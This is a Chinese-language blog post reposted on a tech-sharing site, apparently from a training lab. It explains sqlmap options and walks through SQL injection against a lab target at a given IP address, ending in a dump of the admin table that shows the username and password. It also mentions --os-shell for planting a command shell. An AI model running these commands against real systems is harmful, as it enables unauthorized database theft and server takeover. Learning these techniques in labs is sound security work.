标签:sqlmap http 之猫 -- 200.79 SQL 工具 admin
先说一下最常用的基础指令
-u 指定注入点(一般为url栏的网址)
--dbs 跑库名
--tables 跑表名
--columns 跑字段名
--dump 枚举数据(高危指令,容易进去)
-D 库名 指定数据库
-T 表名 指定表
-C 字段名 指定字段
这里就是更高级一点的指令
--random-agent 选择随机user-agents头
--delay=1 每次探测延迟一秒(防止访问过快被BAN)
--count 查看数据量(比--dump温柔,不会显示敏感信息)
-- proxy"http://127.0.0.1:1080" 使用本地1080端口
--level 1-5 测试等级,等级越高检测越详细,例如level大于2会检测cookie注入,大于3会检测头注入
--risk 一般都用 --level 3 --risk 2
--is-dba 查询当前用户权限,如果DBA是true可以尝试直接拿webshell
--os-shell 尝试往网站中放入一个cmdshell(拥有cmd权限的shell)
需要选择写入shell的脚本语言
好,现在开始正式进入SQL注入子猫舍之sqlmap工具的用法
首先需要检查sqlmap是否能正常使用,在cmd中将文件路径cd为工具所在路径,然后输入如下命令
如果看到了下面的景象,那么恭喜你,工具并无大碍
接着就使用上面提到的指令-u http://59.63.200.79:8003/?id=1,就会自动进行漏洞检测
然后就会显示漏洞检测的结果有两个:基于布尔类型的盲注和基于时间的盲注
但是并没有我们发现的显错注入,这就是工具的弊端,所以不能依赖工具!不能依赖工具!不能依赖工具!
我们默认我们都发现了显错注入漏洞,只是用工具来解放双手
所以现在就要准备提取信息,先定位库和表
先看看有哪些库 python sqlmap.py -u http://59.63.200.79:8003/?id=1 --dbs
这个就是查询到的结果
然后可以使用-u http://59.63.200.79:8003/?id=1 -D maoshe --tables来看看maoshe库里有哪些表主要是寻找admin表,当然其他库也要看看,这里只是因为我们知道maoshe库里有我们想要的东西
这个就是查询到的结果
现在就可以使用能吃牢饭的高危指令(一般做渗透测试未经受援不能查看敏感信息) -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin --dump
来查看admin表里的信息
得到了最后需要的
username:admin
password:hellohack
工具用起来只要知道命令就非常简单,但是工具也只是是没有自主意识的工具,不能完全代替手注所以
不能依赖工具!
不能依赖工具!
不能依赖工具!
标签:sqlmap,http,之猫,--,200.79,SQL,工具,admin 来源: https://www.cnblogs.com/domb2235/p/15530515.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。